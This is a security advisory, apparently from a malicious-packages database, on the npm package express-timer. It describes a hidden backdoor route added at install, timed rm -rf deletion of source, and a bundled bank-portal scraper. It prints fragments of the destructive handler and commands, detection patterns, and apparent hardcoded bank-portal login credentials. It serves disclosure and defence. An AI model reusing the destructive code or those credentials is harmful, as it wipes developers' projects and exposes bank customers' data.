express-timer is a destructive supply-chain attack masquerading as an Express security-headers helper. Three independent harm mechanisms fire on install or load:
Postinstall backdoor injection (scripts/inject.js): The postinstall hook walks up to the installer's project root, locates the main Express entry file, and appends a hidden route handler app.get('/robots.txt', (req, res) => { if (req.query.verify === 'destroy') { _boom();... } }). The injected _boom() recursively deletes the installer's ./src directory (fs.rm(dir, { recursive: true, force: true })) and kills all node processes (taskkill /IM node.exe /F on Windows, pkill -f "node.*<cwd>" on Unix). Any remote actor who hits GET /robots.txt?verify=destroy on the deployed server can wipe the installer's source and crash node processes. The injection persists in the installer's own source tree even after npm uninstall.
Auto-scheduled destruction on require (index.js): package.json sets main: index.js, and that file's top-level code calls scheduleDestructionAfter() with a 1-minute default timer. After 60 seconds, it executes rm -rf <cwd>/src (Unix execSync) or the equivalent fs.rm on Windows, then kills node/PM2 processes. Simply importing the package destroys the consumer's source tree one minute later, with no opt-in, no documented API, and no guard.
Bundled bank-fraud tooling (ibbl_statment.php): The tarball ships a PHP scraper hardcoded with credentials (USER=mohiuddin767272@gmail.com, PASS=Sorifa@2020) for Islami Bank Bangladesh's customer agent portal at https://agent.islamibankbd.com, used to scrape arbitrary customer NIDs, account numbers, and transactions. Unrelated to the advertised purpose; redistributes access to a third-party banking system to anyone who installs the package.
Supporting context: package.json author is the placeholder "Your Name", the description ("Lightweight security helpers for Express") contradicts the actual behavior, and dependencies declares both a self-reference (express-timer: ^1.0.0) and a revealing sibling express-self-destruct1.
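The indicators above (an install-time lifecycle hook, a self-referencing dependency, the scaffold placeholder author, and a route handler appended to the application's own entry file that reaches for recursive deletion or process-kill calls) can be checked mechanically. The following is an added defender-side audit script, not code from the advisory or from the express-timer package; the function names, the sample manifest and the sample Express source are constructed for illustration and are not the package's actual files.

```javascript
// Added example (not from the advisory or the express-timer package): a small
// audit for the indicators the advisory describes. auditManifest() inspects a
// package.json object; findDestructiveRoutes() scans application source for an
// Express route registration whose handler text contains a destructive call.
// All sample data below is constructed for illustration.

const LIFECYCLE_INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Returns a list of human-readable findings for one parsed package.json object.
function auditManifest(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_INSTALL_HOOKS) {
    if (typeof scripts[hook] === 'string') {
      findings.push(`install hook "${hook}" runs: ${scripts[hook]}`);
    }
  }
  // Object.assign skips undefined sources, so missing sections are harmless.
  const deps = Object.assign({}, pkg.dependencies, pkg.devDependencies, pkg.optionalDependencies);
  if (pkg.name && Object.prototype.hasOwnProperty.call(deps, pkg.name)) {
    findings.push(`package depends on itself (${pkg.name}: ${deps[pkg.name]})`);
  }
  if (typeof pkg.author === 'string' && /^your name$/i.test(pkg.author.trim())) {
    findings.push('author is the scaffold placeholder "Your Name"');
  }
  return findings;
}

// Matches app.get('/path', ...) style registrations; group 2 = method, group 4 = path.
const ROUTE_RE = /\b(app|router)\.(get|post|put|delete|all|use)\(\s*(['"`])([^'"`]+)\3/g;
// Destructive primitives named in the advisory: recursive fs.rm, rm -rf, taskkill, pkill.
const DESTRUCTIVE_RE = /fs\.rm(Sync)?\([^)]*recursive\s*:\s*true|rm\s+-rf\b|taskkill\b|pkill\b/;

// Heuristic: the text from one route registration up to the next one is treated as
// that handler's body; any destructive call inside it is reported with method and path.
function findDestructiveRoutes(source) {
  const hits = [];
  const matches = [...source.matchAll(ROUTE_RE)];
  for (let i = 0; i < matches.length; i++) {
    const start = matches[i].index;
    const end = i + 1 < matches.length ? matches[i + 1].index : source.length;
    if (DESTRUCTIVE_RE.test(source.slice(start, end))) {
      hits.push({ method: matches[i][2], path: matches[i][4] });
    }
  }
  return hits;
}

// Constructed sample manifest carrying the indicators the advisory lists.
const SUSPICIOUS_MANIFEST = {
  name: 'express-timer',
  version: '1.0.1',
  description: 'Lightweight security helpers for Express',
  author: 'Your Name',
  main: 'index.js',
  scripts: { postinstall: 'node scripts/inject.js' },
  dependencies: { 'express-timer': '^1.0.0', express: '^4.18.0' },
};

// Constructed sample of an Express entry file after a hidden route was appended to it.
const INJECTED_SOURCE = `
const express = require('express');
const app = express();
app.get('/health', (req, res) => res.send('ok'));
app.get('/robots.txt', (req, res) => {
  if (req.query.verify === 'destroy') { fs.rm('./src', { recursive: true, force: true }, () => {}); }
  res.send('User-agent: *');
});
app.listen(3000);
`;

// Runs both checks against the constructed samples and returns the findings.
function runAudit() {
  return {
    manifest: auditManifest(SUSPICIOUS_MANIFEST),
    routes: findDestructiveRoutes(INJECTED_SOURCE),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runAudit(), null, 2));
}
```

Run it with `node audit.js`; in practice you would feed `auditManifest` the parsed `package.json` of each directory under `node_modules` and `findDestructiveRoutes` the application's own entry file. The source scan matters because, as the advisory notes, the injected route lives in the installer's own tree and survives `npm uninstall`; blocking the install-time hook in the first place is done with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`), which also stops the postinstall stage from running at all.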
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-005395",
"versions": [
"1.0.1"
],
"sha256": "10e5427085b867032f1b16630f04e82e89945022633c39475f30c7855b0fe76f",
"source": "amazon-inspector",
"modified_time": "2026-06-11T02:51:34Z",
"import_time": "2026-06-11T03:48:45.85439911Z"
},
{
"id": "IN-MAL-2026-005392",
"import_time": "2026-06-11T03:48:45.492863604Z",
"sha256": "6bc13771ab814ced3a28c13a753e6c12a6c1cf760883f034a5a02a867b4ffc8d",
"source": "amazon-inspector",
"modified_time": "2026-06-11T02:51:22Z",
"versions": [
"1.0.4"
]
},
{
"id": "IN-MAL-2026-005394",
"versions": [
"1.0.2"
],
"sha256": "7c2b03ef5914ee50d649906c3c1607f9a02334a73b93da3f198ec936a43e4fa7",
"source": "amazon-inspector",
"modified_time": "2026-06-11T02:51:30Z",
"import_time": "2026-06-11T03:48:45.727302846Z"
},
{
"id": "IN-MAL-2026-005393",
"versions": [
"1.0.3"
],
"sha256": "18332a53ad8e0030325aea1b7bbdc537a1ee4112d4ed73e464d5181369ee4509",
"source": "amazon-inspector",
"modified_time": "2026-06-11T02:51:26Z",
"import_time": "2026-06-11T03:48:45.604303234Z"
},
{
"id": "IN-MAL-2026-005391",
"versions": [
"1.0.5"
],
"sha256": "19d2dea0d7ac642b1921e0ac1bab9fa5ac543437d783764952da75a4b1fba33b",
"source": "amazon-inspector",
"modified_time": "2026-06-11T02:51:17Z",
"import_time": "2026-06-11T03:48:45.36592228Z"
},
{
"id": "IN-MAL-2026-005390",
"versions": [
"1.0.6"
],
"sha256": "5b4fd1651a86f29904cbafe5a1d50f51a3108413ce0fef61fd92cfc61dedc683",
"source": "amazon-inspector",
"modified_time": "2026-06-11T02:51:05Z",
"import_time": "2026-06-11T03:48:45.264878524Z"
}
]
}
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-timer/MAL-2026-5555.json
{
"evidence_files": [
{
"path": "scripts/inject.js",
"sha256": "b1970350a7bc69bef9cf4061fd46571d344e2c11dde87f0e69ea28e983340eae",
"tlsh": "c7513254c67a4231eef277fd622a0416ba5bd831365151e0b2dc817d3f9247148e2efe"
},
{
"path": "index.js",
"sha256": "a7e860721fb8d25ad3f46fdb65e0444752f294ee9673c3b9c9480eec4ab432d8",
"tlsh": "ab1271267cfd60b355f1caa1562b0053f86b8217876cd21936adc36a0fb4158463fdaf"
},
{
"path": "package.json",
"sha256": "17a21d8755595e763dd71b93d3cf4ccb12f9a2f9abc7fd0bcf16decdcb93e39d",
"tlsh": "13f08c35a814997711faa6a76c754286b1610f1b11a4dc0e32ba00a88b6265708aefe8"
}
],
"package_integrity": [
{
"filename": "express-timer-1.0.1.tgz",
"hashes": {
"sha512_sri": "sha512-uKZilAXCZfBrfjJ0AuuCEpfQ4K9rTDjD6Kz5J9yiWSBsciQzS0CRPR/6vnI25gUHr3ouqWXS4GBSnt7wM5JstA==",
"sha1": "3edb798ac8f379e8c6294446213a8bda504e10cd"
}
}
]
}
[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]